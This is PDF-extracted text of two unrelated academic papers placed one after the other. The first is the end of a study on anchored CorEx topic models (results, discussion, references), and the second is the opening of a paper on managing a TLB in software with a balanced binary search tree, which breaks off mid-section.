Reliefweb and 20 News- groups datasets, and 30 topics on the clinical health notes. homogeneity than LDA. On the disaster relief arti- cles, the CorEx clusters are nearly twice as homoge- neous as the LDA clusters. CorEx outperforms LDA in terms of topic coher- ence on two out of three of the datasets. While LDA 535 0.0 0.1 0.2 0.3 0.4 0.5 H o m o g e n e it y Unsupervised Semi-Supervised Disaster Relief Articles (21 topics) Unsupervised Semi-Supervised 20 Newsgroups (20 topics) 0.0 0.1 0.2 0.3 0.4 0.5 A d ju st e d M u tu a l In fo rm a ti o n Co rEx LD A An ch ore d C orE x Lin ke d L DA z-l ab els LD A 120 100 80 60 C o h e re n c e Co rEx LD A An ch ore d C orE x Lin ke d L DA z-l ab els LD A Figure 3: Comparison of anchored CorEx to other semi- supervised topic models in terms of document clustering and topic coherence. For each dataset, the number of top- ics is fixed to the number of document labels. Each dot is the average of 30 runs. Confidence intervals are plotted but are so small that they are not distinguishable. produces more coherent topics for the clinical health notes, it is particularly striking that CorEx is able to produce high quality topics while only leverag- ing binary count data. Examples of these topics are shown in Table 1. Despite the binary counts limi- tation, CorEx still finds meaningfully coherent and competitive structure in the data. 5.2 Anchored CorEx Analysis We now examine the effects and benefits of guiding CorEx through anchor words. In doing so, we also compare anchored CorEx to other semi-supervised topic models. 5.2.1 Anchoring for Topic Separability We are first interested in how anchoring can be used to encourage topic separability so that docu- ments cluster well. We focus on the HA/DR articles and 20 newsgroups datasets, since traditional clus- tering metrics are not well-defined on the multi-label clinical health notes. For both datasets, we fix the Rank Anchored Disaster Relief Topic 1 harvest, locus, drought, food crisis, farmers, crops, crop, malnutrition, food aid, livestock 4 tents, quake, international federation, red crescent, red cross, blankets, earthquake, richter scale, societies, aftershocks 12 climate, impacts, warming, climate change, irrigation, consumption, household, droughts, livelihoods, interventions 19 storms, weather, winds, coastal, tornado, meteorological, tornadoes, strong winds, tropical, roofs Rank Anchored 20 Newsgroups Topic 5 government, congress, clinton, state, national, economic, general, states, united, order 6 bible, christian, god, jesus, christians, believe, life, faith, world, man 15 use, used, high, circuit, power, work, voltage, need, low, end 20 baseball, pitching, braves, mets, hitter, pitcher, cubs, dl, sox, jays Table 2: Examples of topics learned by CorEx when simultaneously anchoring many topics with anchoring parameter β = 2. Anchor words are shown in bold. Words are ranked according to mutual information with the topic, and topics are ranked according to the amount of total correlation they explain. Topic models were run with 21 topics on the Reliefweb articles and 20 topics on the 20 Newsgroups dataset. number of topics to be equal to the number of doc- ument labels. It is in this context that we compare anchored CorEx to two other semi-supervised topic models: z-labels LDA and must/cannot link LDA. Using the method described in Section 4.3, we au- tomatically retrieve the top five anchors for each dis- aster type and newsgroup. We then filter these lists of any words that are ambiguous, i.e. words that are anchor words for more than one document label. For anchored CorEx and z-labels LDA we simulta- neously assign each set of anchor words to exactly one topic each. For must/cannot link LDA, we cre- ate must-links within the words of the same anchor 536 group, and create cannot-links between words of dif- ferent anchor groups. Since we are simultaneously anchoring to many topics, we use a weak anchoring parameter β = 2 for anchored CorEx. Using the notation from their original papers, we use η = 1 for z-labels LDA, and η = 1000 for must/cannot link LDA. For both LDA variants, we use α = 0.5, β = 0.1 and take 2,000 samples, and estimate the models using code implemented by the original authors. The results of this comparison are shown in Fig- ure 3, and examples of anchored CorEx topics are shown in Table 2. Across all measures CorEx and anchored CorEx outperform LDA. We find that an- chored CorEx always improves cluster quality ver- sus CorEx in terms of homogeneity and adjusted mutual information. Compared to CorEx, multiple simultaneous anchoring neither harms nor benefits the topic coherence of anchored CorEx. Together these metrics suggest that anchored CorEx is find- ing topics that are of equivalent coherence to CorEx, but more relevant to the document labels since gains are seen in terms of document clustering. Against the other semi-supervised topic models, anchored CorEx compares favorably. The document clustering of anchored CorEx is similar to, or bet- ter than, that of z-labels LDA and must/cannot link LDA. Across the disaster relief articles, anchored CorEx finds less coherent topics than the two LDA variants, while it finds similarly coherent topics as must/cannot link LDA on the 20 newsgroup dataset. 5.2.2 Anchoring for Topic Representation We now turn to studying how domain knowledge can be anchored to a single topic to help an other- wise dominated topic emerge, and how the anchor- ing parameter β affects that emergence. To discern this effect, we focus just on anchored CorEx along with the HA/DR articles and clinical health notes, datasets for which we have a domain expert lexicon. We devise the following experiment: first, we de- termine the top five anchor words for each docu- ment label using the methodology described in Sec- tion 4.3. Unlike in the previous section, we do not filter these lists of ambiguous anchor words. Sec- ond, for each document label, we run an anchored CorEx topic model with that label’s anchor words anchored to exactly one topic. We compare this an- 0.4 0.2 0.0 0.2 0.4 0.6 T o p ic O v e rl a p D if f. P o st -A n c h o ri n g Disaster Relief Articles 0.2 0.0 0.2 0.4 0.6 Clinical Health Notes 40 20 0 20 40 60 80 100 P e rc e n t C h a n g e i n T o p ic C o h e re n c e 100 50 0 50 100 150 200 1 2 3 4 5 6 7 8 9 10 Anchoring Parameter β 0.15 0.10 0.05 0.00 0.05 0.10 0.15 F 1 D if fe re n c e P o st -A n c h o ri n g 1 2 3 4 5 6 7 8 9 10 Anchoring Parameter β 0.2 0.1 0.0 0.1 0.2 0.3 0.4 Figure 4: Effect of anchoring words to a single topic for one document label at a time as a function of the anchor- ing parameter β. Light gray lines indicate the trajectory of the metric for a given disaster or disease label. Thick red lines indicate the pointwise average across all labels for fixed value of β. chored topic model to an unsupervised CorEx topic model using the same random seeds, thus creating a matched pair where the only difference is the treat- ment of anchor words. Finally, this matched pairs process is repeated 30 times, yielding a distribution for each metric over each label. We use 50 topics when modeling the ReliefWeb articles and 30 topics when modeling the i2b2 clin- ical health notes. These values were chosen by ob- serving diminishing returns to the total correlation explained by additional topics. In Figure 4 we show how the results of this ex- periment vary as a function of the anchoring pa- rameter β for each disaster and disease type in the two data sets. Since there is heavy variance across document labels for each metric, we also examine a more detailed cross section of these results in Fig- ure 5, where we set β = 5 for the clinical health notes and set β = 10 for the disaster relief arti- cles. As we show momentarily, disaster and disease types that benefit the most from anchoring were un- 537 0.1 0.0 0.1 0.2 0.3 0.4 0.5 0.6 Tropical Cyclone Flood Epidemic Earthquake Drought Volcano Flash Flood Insect Infestation Cold Wave Technological Disaster Tsunami Land Slide Wild Fire Severe Local Storm Other Snow Avalanche Extratropical Cyclone Mud Slide Heat Wave Storm Surge Fire Anchoring Parameter β = 10 50 0 50 100 Anchoring Parameter β = 10 0.10 0.05 0.00 0.05 0.10 0.15 0.20 Anchoring Parameter β = 10 0.1 0.0 0.1 0.2 0.3 0.4 0.5 0.6 Topic Overlap Diff. Post-Anchoring Asthma Coronary Heart Disease Congestive Heart Failure Depression Diabetes GERD Gallstones Gout Hypercholesterolemia Hypertension Hypertriglyceridemia Osteoarthritis Obstructive Sleep Apnea Obesity Peripheral Vascular Disease Anchoring Parameter β = 5 50 0 50 100 Percent Change of Anchored Topic Coherence when Most Predictive Topic Anchoring Parameter β = 5 0.1 0.0 0.1 0.2 0.3 0.4 F1 Difference Post-Anchoring Anchoring Parameter β = 5 0.0 0.5 1.0 P ro p o rtio n o f R u n s A n c h o re d T o p ic is th e M o st P re d ic tiv e 0.0 0.5 1.0 A v e ra g e F 1 S c o re P re -A n c h o rin g 0.0 0.5 1.0 A v e ra g e T o p ic O v e rla p P re -A n c h o rin g 0.0 0.5 1.0 P ro p o rtio n o f R u n s A n c h o re d T o p ic is th e M o st P re d ic tiv e 0.0 0.5 1.0 A v e ra g e F 1 S c o re P re -A n c h o rin g 0.0 0.5 1.0 A v e ra g e T o p ic O v e rla p P re -A n c h o rin g Figure 5: Cross-section results of the anchoring metrics from fixing β = 5 for the clinical health notes, and β = 10 for the disaster relief articles. Disaster and disease types are sorted by frequency, with the most frequent document labels appearing at the top. Error bars indicate 95% confidence intervals. The color bars provide context for each metric: topic overlap pre-anchoring, proportion of topic model runs where the anchored topic was the most predictive topic, and F1 score pre-anchoring. derrepresented pre-anchoring. Document labels that were well-represented prior to anchoring achieve only marginal gain. This results in the variance seen in Figure 4. A priori we do not know that anchoring will cause the anchor words to appear at the top of topics. So, we first measure how the topic overlap, the propor- tion of the top ten mutual information words that ap- pear within the top ten words of the topics, changes before and after anchoring. From Figure 4 (row 1) we see that as β increases, more of these rel- evant words consistently appear within the topics. For the disaster relief articles, many disaster types see about two more words introduced, while in the clinical health notes the overlap increases by up to four words. Analyzing the cross section in Fig- ure 5 (column 1), we see many of these gains come from disaster and disease types that appeared less in the topics pre-anchoring. Thus, we can sway the topic model towards less dominant themes through anchoring. Document labels that occur the most frequently are those for which the topic overlap changes the least. Next, we examine whether these anchored topics are more coherent topics. To do so, we compare the coherence of the anchored topic with that of the most predictive topic pre-anchoring, i.e. the topic with the largest corresponding coefficient in magnitude of the logistic regression, when the anchored topic itself is most predictive. From Figure 4 (row 2), we see these results have more variance, but largely the anchored topics are more coherent. In some cases, the coher- ence is 1.5 to 2 times that of pre-anchoring. Fur- thermore, by colors of the central panel of Figure 5, we find that the anchored topics are, indeed, often the most predictive topics for each document label. Similar to topic overlap, the labels that see the least improvement are those that appear the most and are already well-represented in the topic model. Finally, we find that the anchored, more coherent topics can lead to modest gains in document clas- sification. For the disaster relief articles, Figure 4 (row 3) shows that there are mixed results in terms of F1 score improvement, with some disaster types performing consistently better, and others perform- ing consistently worse. The results are more consis- tent for the clinical health notes, where there is an average increase of about 0.1 in the F1 score, and 538 some disease types see an increase of up to 0.3 in F1. Given that we are only anchoring 5 words to the topic model, these are significant gains in predictive power. Unlike the gains in topic overlap and coherence, the F1 score increases do not simply correlate with which document labels appeared most frequently. For example, we see in Figure 5 (column 3) that Tropical Cyclone exhibits the largest increase in pre- dictive performance, even though it is also one of the most frequently appearing document labels. Simi- larly, some of the major gains in F1 for the disease types, and major losses in F1 for the disaster types, do not come from the most or least frequent docu- ment labels. Thus, if using anchoring single topics within CorEx for document classification, it is im- portant to examine how the anchoring affects pre- diction for individual document labels. 5.2.3 Anchoring for Topic Aspects Finding topics that revolve around a word, such as a name or location, or a group of words can aid in understanding how a particular subject or event has been framed. We finish with a qualitative ex- periment where we disambiguate aspects of a topic by anchoring a set of words to multiple topics within the CorEx topic model. Note, must/cannot link LDA cannot be used in this manner, and z-labels LDA would require us to know these aspects beforehand. We consider tweets containing #Ferguson (case- insensitive), which detail reactions to the shooting of Black teenager Michael Brown by White po- lice officer Darren Wilson on August 9th, 2014 in Ferguson, Missouri. These tweets were collected from the Twitter Gardenhose, a 10% random sam- ple of all tweets, over the period August 9th, 2014 to November 30th, 2014. Since CorEx will seek max- imally informative topics by exploiting redundan- cies, we remove duplicates of retweets, leaving us with 869,091 tweets. We filter these tweets of punc- tuation, stop words, hyperlinks, usernames, and the ‘RT’ retweet symbol, and use the top 20,000 word types. In the wake of both the shooting and the eventual non-indictment of Darren Wilson, several protests occurred. Some onlookers supported and encour- aged such protests, while others characterized the protests as violent “riots.” To disambiguate these Topic Aspects of “protest” 1 protest, protests, peaceful, violent, continue, night, island, photos, staten, nights 2 protest, protests, #hiphopmoves, #cole, hiphop, nationwide, moves, fo, anheuser, boeing 3 protest, protests, st, louis, guard, national, county, patrol, highway, city 4 protest, protests, paddy, covering, beverly, walmart, wagon, hills, passionately, including 5 protest, protests, solidarity, march, square, rally, #oakland, downtown, nyc, #nyc Topic Aspects of “riot” 6 riot, riots, unheard, language, inciting, accidentally, jokingly, watts, waving, dies 7 riot, black, riots, white, #tcot, blacks, men, whites, race, #pjnet 8 riot, riots, looks, like, sounds, acting, act, animals, looked, treated 9 riot, riots, store, looting, businesses, burning, fire, looted, stores, business 10 gas, riot, tear, riots, gear, rubber, bullets, military, molotov, armored Table 3: Topic aspects around “protest” and “riot” from running a CorEx topic model with 55 topics and anchor- ing “protest” and “protests” together to five topics and “riot” and “riots” together to five topics with β = 2. An- chor words are shown in bold. Note, topics are not or- dered by total correlation. different depictions, we train a CorEx topic model with 55 topics, anchoring “protest” and “protests” together to five topics, and “riot” and “riots” to- gether to five topics with β = 2. These anchored topics are presented in Table 3. The anchored topics reflect different aspects of the framing of the “protests” and “riots,” and are generally interpretable, despite the typical difficulty of extracting coherent topics from short documents using LDA (Tang et al., 2014). The “protest” topic aspects describe protests in St. Louis, Oakland, Bev- erly Hills, and parts of New York City (topics 1, 3, 4, 5), resistance by law enforcement (topics 3 and 4), and discussion of whether the protests were peaceful (topic 1). Topic 2 revolves around hip-hop artists who marched in solidarity with protesters. 539 The “riot” topic aspects discuss racial dynamics of the protests (topic 7) and suggest the demonstrations are dangerous (topics 8 and 9). Topic 10 describes the “riot” gear used in the militarized response to the Ferguson protesters, and Topic 7 also hints at aspects of conservatism through the hashtags #tcot (Top Conservatives on Twitter) and #pjnet (Patriot Journalist Network). As we see, anchored CorEx finds several in- teresting, non-trivial aspects around “protest” and “riot” that could spark additional qualitative inves- tigation. Retrieving topic aspects through anchor words in this manner allows the user to explore dif- ferent frames of complex issues, events, or discus- sions within documents. As with the other anchor- ing strategies, this has the potential to supplement qualitative research done by researchers within the social sciences and digital humanities. 6 Discussion We have introduced an information-theoretic topic model, CorEx, that does not rely on any of the gener- ative assumptions of LDA-based topic models. This topic model seeks maximally informative topics as encoded by their total correlation. We also derived a flexible method for anchoring word-level domain knowledge in the CorEx topic model through the in- formation bottleneck. Anchored CorEx guides the topic model towards themes that do not naturally emerge, and often produces more coherent and pre- dictive topics. Both CorEx and anchored CorEx consistently produce topics that are of comparable quality to LDA-based methods, despite only making use of binarized word counts. Anchored CorEx is more flexible than previous attempts at integrating word-level information into topic models. Topic separability can be enforced by lightly anchoring disjoint groups of words to sepa- rate topics, topic representation can be promoted by assertively anchoring a group of words to a single topic, and topic aspects can be unveiled by anchor- ing a single group of words to multiple topics. The flexibility of anchoring through the information bot- tleneck lends itself to many other possible creative anchoring strategies that could guide the topic model in different ways. Different goals may call for dif- ferent anchoring strategies, and domain experts can shape these strategies to their needs. While we have demonstrated several advantages of the CorEx topic model to LDA, it does have some technical shortcomings. Most notably, CorEx re- lies on binary count data in its sparsity optimiza- tion, rather than the standard count data that is used as input into LDA and other topic models. While we have demonstrated CorEx performs at the level of LDA despite this limitation, its effect would be more noticeable on longer documents. This can be partly overcome if one chunks such longer docu- ments into shorter subdocuments prior to running the topic model. Our implementation also requires that each word appears in only one topic. These lim- itations are not fundamental limitations of the the- ory, but a matter of computational efficiency. In future work, we hope to remove these restrictions while preserving the speed of the sparse CorEx topic modeling algorithm. As we have demonstrated, the information- theoretic approach provided via CorEx has rich po- tential for finding meaningful structure in docu- ments, particularly in a way that can help domain experts guide topic models with minimal interven- tion to capture otherwise eclipsed themes. The lightweight and versatile framework of anchored CorEx leaves open possibilities for theoretical ex- tensions and novel applications within the realm of topic modeling. Acknowledgments We would like to thank the Machine Intelligence and Data Science (MINDS) research group at the Infor- mation Sciences Institute for their help and insight during the course of this research. We also thank the Vermont Advanced Computing Core (VACC) for its computational resources. Finally, we thank the anonymous reviewers and the TACL action editors Diane McCarthy and Kristina Toutanova for their time and effort in helping us improve our work. Ryan J. Gallagher was a visiting research assistant at the Information Sciences Institute while perform- ing this research. Ryan J. Gallagher and Greg Ver Steeg were supported by DARPA award HR0011- 15-C-0115 and David Kale was supported by the Alfred E. Mann Innovation in Engineering Doctoral Fellowship. 540 References David Andrzejewski and Xiaojin Zhu. 2009. Latent Dirichlet Allocation with topic-in-set knowledge. In Proceedings of the NAACL HLT 2009 Workshop on Semi-Supervised Learning for Natural Language Pro- cessing, pages 43–48. Association for Computational Linguistics. David Andrzejewski, Xiaojin Zhu, and Mark Craven. 2009. Incorporating domain knowledge into topic modeling via Dirichlet forest priors. In Proceedings of the 26th Annual International Conference on Machine Learning, pages 25–32. David Andrzejewski, Xiaojin Zhu, Mark Craven, and Benjamin Recht. 2011. A framework for incorpo- rating general domain knowledge into latent Dirichlet allocation using first-order logic. In Proceedings of the International Joint Conference on Artificial Intelli- gence, volume 22, page 1171. Sanjeev Arora, Rong Ge, and Ankur Moitra. 2012. Learning topic models–going beyond SVD. In 2012 IEEE 53rd Annual Symposium on Foundations of Computer Science (FOCS), pages 1–10. IEEE. Sanjeev Arora, Rong Ge, Yonatan Halpern, David M. Mimno, Ankur Moitra, David Sontag, Yichen Wu, and Michael Zhu. 2013. A practical algorithm for topic modeling with provable guarantees. In Proceedings of International Conference on Machine Learning, pages 280–288. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet Allocation. Journal of Ma- chine Learning Research, 3(Jan):993–1022. Wray Buntine and Aleks Jakulin. 2006. Discrete compo- nent analysis. In Subspace, Latent Structure and Fea- ture Selection, pages 1–33. Springer. Jonathan Chang, Sean Gerrish, Chong Wang, Jordan L. Boyd-Graber, and David M. Blei. 2009. Reading tea leaves: How humans interpret topic models. In Advances in Neural Information Processing Systems, pages 288–296. Wendy W. Chapman, Will Bridewell, Paul Hanbury, Gre- gory F. Cooper, and Bruce G. Buchanan. 2001. A simple algorithm for identifying negated findings and diseases in discharge summaries. Journal of Biomedi- cal Informatics, 34(5):301–310. Peixian Chen, Nevin L. Zhang, Leonard K. M. Poon, and Zhourong Chen. 2016. Progressive EM for latent tree models and hierarchical topic detection. In Proceed- ings of the Thirtieth AAAI Conference on Artificial In- telligence, pages 1498–1504. Manhong Dai, Nigam H. Shah, Wei Xuan, Mark A. Musen, Stanley J. Watson, Brian D. Athey, Fan Meng, et al. 2008. An efficient solution for mapping free text to ontology terms. AMIA Summit on Translational Bioinformatics, 21. Chris Ding, Tao Li, and Wei Peng. 2008. On the equiv- alence between non-negative matrix factorization and probabilistic latent semantic indexing. Computational Statistics & Data Analysis, 52(8):3913–3927. James Foulds, Shachi Kumar, and Lise Getoor. 2015. Latent topic networks: A versatile probabilistic pro- gramming framework for topic models. In Pro- ceedings of the International Conference on Machine Learning, pages 777–786. Nir Friedman, Ori Mosenzon, Noam Slonim, and Naftali Tishby. 2001. Multivariate information bottleneck. In Proceedings of the Seventeenth Conference on Uncer- tainty in Artificial Intelligence, pages 152–161. Thomas L. Griffiths, Michael I. Jordan, Joshua B. Tenen- baum, and David M. Blei. 2004. Hierarchical topic models and the nested Chinese restaurant process. In Advances in Neural Information Processing Systems, pages 17–24. Yoni Halpern, Youngduck Choi, Steven Horng, and David Sontag. 2014. Using anchors to estimate clini- cal state without labeled data. In AMIA Annual Sympo- sium Proceedings. American Medical Informatics As- sociation. Yoni Halpern, Steven Horng, and David Sontag. 2015. Anchored discrete factor analysis. arXiv preprint arXiv:1511.03299. Nathan Hodas, Greg Ver Steeg, Joshua Harrison, Satish Chikkagoudar, Eric Bell, and Courtney Corley. 2015. Disentangling the lexicons of disaster response in Twitter. In The 3rd International Workshop on Social Web for Disaster Management (SWDM’15). Matthew D. Hoffman, David M. Blei, Chong Wang, and John Paisley. 2013. Stochastic variational inference. Journal of Machine Learning Research, 14(1):1303– 1347. Thomas Hofmann. 1999. Probabilistic latent semantic analysis. In Proceedings of the Fifteenth Conference on Uncertainty in Artificial Intelligence, pages 289– 296. Jagadeesh Jagarlamudi, Hal Daumé III, and Raghaven- dra Udupa. 2012. Incorporating lexical priors into topic models. In Proceedings of the 13th Conference of the European Chapter of the Association for Com- putational Linguistics, pages 204–213. Association for Computational Linguistics. Moontae Lee and David Mimno. 2014. Low- dimensional embeddings for interpretable anchor- based topic inference. In Proceedings of Empiri- cal Methods in Natural Language Processing, pages 1319–1328. Moshe Lichman. 2013. UC Irvine Machine Learning Repository. 541 Jon D. McAuliffe and David M. Blei. 2008. Supervised topic models. In Advances in Neural Information Pro- cessing Systems, pages 121–128. Shike Mei, Jun Zhu, and Jerry Zhu. 2014. Robust Reg- Bayes: Selectively incorporating first-order logic do- main knowledge into Bayesian models. In Proceed- ings of the 31st International Conference on Machine Learning (ICML-14), pages 253–261. David Mimno, Hanna M. Wallach, Edmund Talley, Miriam Leenders, and Andrew McCallum. 2011. Op- timizing semantic coherence in topic models. In Pro- ceedings of the Conference on Empirical Methods in Natural Language Processing, pages 262–272. Asso- ciation for Computational Linguistics. Thang Nguyen, Yuening Hu, and Jordan L. Boyd-Graber. 2014. Anchors regularized: Adding robustness and extensibility to scalable topic-modeling algorithms. In Proceedings of the Association of Computational Lin- guistics, pages 359–369. Thang Nguyen, Jordan Boyd-Graber, Jeffrey Lund, Kevin Seppi, and Eric Ringger. 2015. Is your anchor going up or down? Fast and accurate supervised topic models. In Proceedings of North American Chapter of the Association for Computational Linguistics. Fabian Pedregosa, Gaël Varoquaux, Alexandre Gram- fort, Vincent Michel, Bertrand Thirion, Oliver Grisel, Mathieu Blondel, Peter Prettenhofer, Ron Weiss, Vin- cent Dubourg, Jake Vanderplas, Alexandre Passos, David Cournapeau, Matthieu Brucher, Matthieu Per- rot, and Édouard Duchesnay. 2011. Scikit-learn: Ma- chine learning in Python. Journal of Machine Learn- ing Research, 12:2825–2830. Radim Řehůřek and Petr Sojka. 2010. Software Frame- work for Topic Modeling with Large Corpora. In Pro- ceedings of the LREC 2010 Workshop on New Chal- lenges for NLP Frameworks, pages 45–50. Kyle Reing, David C. Kale, Greg Ver Steeg, and Aram Galstyan. 2016. Toward interpretable topic discovery via anchored correlation explanation. ICML Workshop on Human Interpretability in Machine Learning. Michal Rosen-Zvi, Thomas Griffiths, Mark Steyvers, and Padhraic Smyth. 2004. The author-topic model for au- thors and documents. In Proceedings of the 20th Con- ference on Uncertainty in Artificial Intelligence, pages 487–494. Jian Tang, Zhaoshi Meng, Xuanlong Nguyen, Qiaozhu Mei, and Ming Zhang. 2014. Understanding the limit- ing factors of topic modeling via posterior contraction analysis. In Proceedings of the International Confer- ence on Machine Learning, pages 190–198. Naftali Tishby, Fernando C. Pereira, and William Bialek. 1999. The information bottleneck method. In Pro- ceedings of 37th Annual Allerton Conference on Com- munication, Control and Computing, pages 368–377. Greg Ver Steeg and Aram Galstyan. 2014. Discovering structure in high-dimensional data through correlation explanation. In Advances in Neural Information Pro- cessing Systems, pages 577–585. Greg Ver Steeg and Aram Galstyan. 2015. Maxi- mally informative hierarchical representations of high- dimensional data. In Artificial Intelligence and Statis- tics, pages 1004–1012. 542 work_ws6l4gb3gvcpzpqceub7wmhoma ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-037 50 Software TLB Management Method Based on Balanced Binary Tree Chen Hongyu School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 15771900781@189.cn Zhang Yuke School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 17792012345@189.cn Zhao Li School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: zhaoli1998@163.com Ai Jian School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: aijianup@163.com Abstract—Purpose: with the development of the computer system, there is a higher request to reduce the failure times of Translation Look—aside Buffer and relieve the failure influence, normal solution is deal with TLB failure by software or hardware, it find the page table and then implement the index operation to locate the page want. Method: In order to satisfy the needs of software management method for mapping speed from virtual address to physical address and to expand the size of TLB, our team design a software management method based on balanced binary search tree. Page management is implemented in software management, TLB is managed by operating system based on abstract model, and MMU (memory management unit) is no longer used Unit, our team build a balanced binary tree to search TLB. Result: Binary search tree has the advantage of pruning in the interval search problem under the balanced state. Therefore, searching TLB by this method is conducive to the expansion of TLB capacity, making space for cache and other performance improvement designs on chip and reducing costs. However, the search speed is reduced and some time is sacrificed to free up CPU space. Conclusion: This method can free up CPU design space, also can expand more size of TLB and reduce the cost, its optimization algorithm is worthy of further research. Keywords-Component; TLB; Balance Binary Tree; Management of Software I. INTRODUCTION With the continuous development of the computer, the speed of CPU is faster and faster, but the speed of memory has not been improved. The development of TLB will help computer to process large virtual address. In this paper, our team design a TLB software management method of constructing a balanced binary search tree based on virtual page number. When the TLB capacity of balanced binary search tree is large, the method could deal with it quickly, for example, the number of virtual page numbers in balanced state is doubled, and the average retrieval times only need to be increased once. Therefore, the retrieval speed is fast, the capacity increases, and the hit rate will also increase. Moreover, the time cost of tree building is evenly distributed in each search, and the average search time decreases. The balanced binary search tree is used to cut the interval search the advantage of branch and search is to quickly search the virtual page number and locate it to the corresponding location of the memory. Because the page number needs to be searched many times, it helps to deal with the large virtual space. II. TLB Most programs always visit a few pages many times, so TLB records frequent pages and their information, which can accelerate the mapping from virtual address to physical address. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 51 The basic unit of TLB internal storage is the page table item, which corresponds to the page table item stored in RAM, the more TLB capacity, the more page table items can be stored, and increase the probability of TLB hit rate. Due to the limited capacity of TLB, RAM page table and TLB page table items cannot be one-to-one correspondence. A. Location TLB is used to cache some tab table entries. TLB can be between CPU and CPU cache, or between CPU cache and main memory, depending on whether cache uses physical addressing or virtual addressing. If the cache is a virtual addressing, the addressing request is sent directly from the CPU to the cache, and then the required TLB entries are accessed from the cache. If the cache uses physical addressing, the CPU will first perform for each memory operation and send the obtained physical address to the cache. Each method has its own advantages and disadvantages. B. Common optimization A common optimization of cache with physical addressing is parallel TLB search and cache access. The lower bits of all virtual addresses (e.g., the lower 12 bits in the virtual address when there is a 4KB tab in the virtual memory system) represent the address offset (in page address) of the requested address within the paging, and these bits will not change during the transition from the virtual address to the physical address. The process of accessing the CPU cache consists of two steps: use an index to find the corresponding entries in the CPU cache data store, and then compare the corresponding tags of the CPU cache entries found. If the cache is indexed by the same page address during the translation of addresses, the translation of higher bits of virtual and real address (i.e. page to page address / page number of pages) on TLB and the "index" operation of CPU cache can be performed in parallel. The page number of the physical address obtained from the TLB is then sent to the CPU cache. The CPU cache compares page number tags to determine whether the access is missing or missing. It is also possible to perform TLB search and CPU cache access in parallel, even if the CPU cache must use some bits that may change after address translation. Refer to the address translation section of cache entry for further details on cache and TLB under virtual addressing. III. ALGORITHM OF BALANCED BINARY SEARCH TREE Balanced binary tree has the following properties: it is an empty tree or the absolute value of the height difference between its left and right sub trees is no more than 1, and the left and right sub trees are both balanced binary tree. A. Insert operation Inserting a new node into the balanced binary tree destroys the balance of the balanced binary tree. First of all, our team need to find the pointer of the root node of the minimum sub tree which is out of balance after inserting a new node. Then adjust the link relationship between the nodes in the sub tree to make it a new balanced sub tree. When the unbalanced minimum sub tree is adjusted to a balanced sub tree, all the other unbalanced sub trees do not need to be adjusted. LL type adjustment: Insert a node on the left sub tree of point B. After insertion, the balance factor of the left sub tree of point B becomes 1 and that of node a becomes 2. In this way, it can see that the sub tree with node a as the root node is the minimum unbalanced sub tree. When adjusting, the left child B of a is rotated to the right instead of a as the root node of the original unbalanced sub tree, and the lower right rotation of the node of a is called the root node of the right sub tree of B, and the original right sub tree of B becomes the left sub tree of A. In the binary search tree insertion and deletion operations, the advantage of using balanced tree is to make the tree structure better, so as to improve the speed of search operation. The disadvantage is that the insertion and deletion operations become more complicated, which reduces their operation speed. The operation of the imbalance caused by deleting a node in a binary search tree is more complex than that of inserting a node, so it will not be discussed here. B. AVL Deletion Like the insert operation, deleting a node may break the balance, which requires us to adjust the balance when deleting. The deletion is divided into the following situations:  First, search the whole binary tree for the node to be deleted. If it is not found, it will be returned without processing. Otherwise, the following operations will be performed.The node to be deleted is the current root node t.If the left and right sub trees are not empty. The deletion operation is implemented in the higher sub tree.  The height of the left sub tree is greater than that of the right sub tree. Assign the largest International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 52 element in the left sub tree to the current root node, and then delete the node with the largest element value in the left sub tree.  If the height of the left sub tree is less than that of the right sub tree, assign the smallest element in the right sub tree to the current root node, and then delete the node with the smallest element value in the right sub tree.  If one of the left and right sub trees is empty, replace the current root node with the non empty sub tree or null.  If the element value of the node to be deleted is less than the T value of the current root node, delete it in the left sub tree.  Recursively, delete in the left sub tree. This is to determine whether the current root node still meets the equilibrium condition. If the equilibrium condition is satisfied, only the height information of the current root node T needs to be updated. Otherwise, rotation adjustment is required. If the height of the left sub tree of the left child node of T is greater than the height of the right sub tree of the left child node of T, the corresponding single rotation is performed. Otherwise, double rotation is performed. The element value of the node to be deleted is greater than the T value of the current root node. Delete it in the right sub tree. C. Summary:  Non leaf nodes have at most two child nodes.  The value of non leaf node is larger than that of left child node and less than that of right child node.  The difference in the number of levels on the left and right sides of the tree is no more than 1.  There are no nodes with identical values. IV. DESIGN SCHEME The application of page number can be approximately regarded as a combination of mass or partially ordered intervals over time. When the CPU offer page number request, the operating system first searches the balanced binary search tree about page number in TLB, and compares the root node with the request page number. If the page number of the root node is greater than the request page number, the operating system first searches the balanced binary search tree of the TLB, Recursively search in the left sub tree. If the page number of the root node is less than the request page number, then it is recursively searched in the right sub tree. If the page number of the root node is exactly equal to the request page number, the query is considered successful. The corresponding physical block will read out, and the adder is used to splice the address in the page to convert it into the corresponding physical address. A. Recursion exit Therefore, there are two exits for the end of recursion.  One is that the access is successful and the corresponding physical address is obtained;  the other is that the left or right sub tree of the root node is empty. If the access fails, there is no corresponding page number in the TLB. The operating system will retrieve the page table in memory, call the corresponding page table entry into TLB, and insert it into the balanced binary search of the TLB according to the page table entry in the tree. When the balanced binary tree constructed by TLB is full, it is necessary to replace the oldest page table entries. For deleting a page table item, it is necessary to set different flag bits for replacement operation which accord to the corresponding replacement algorithm. Deletion will also cause imbalance, it is necessary to balance the binary search tree first after deletion. 5 82 4 3-1 8 9-1 2 41 1 -1-1 9 -1-1 3 -1-1 Left tree index Virtual page number Right tree index Figure 1. Model International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 53 start CPU put forward the requests of virtual page number Search root node Equal root virtual page? Add the frame number and address in the page Search left tree recursively Left tree is empty? is virtual page number greater than the root node page number? Visit the storage Search right tree recursively Right tree is empty? end Empty tree? N TLB failure TLB failure success N Y failure N Y N Y Y Figure 2. Search step V. TLB STORAGE A typical page table entry includes page frame number, protection bit, modification bit (dirty bit), access bit, cache forbidden bit and on / off bit. TLB has virtual page number, significant bit, modification bit, protection bit, page frame number, root node index bit of left and right sub tree, balance factor and so on. Significant protect modify Page number Left tree index 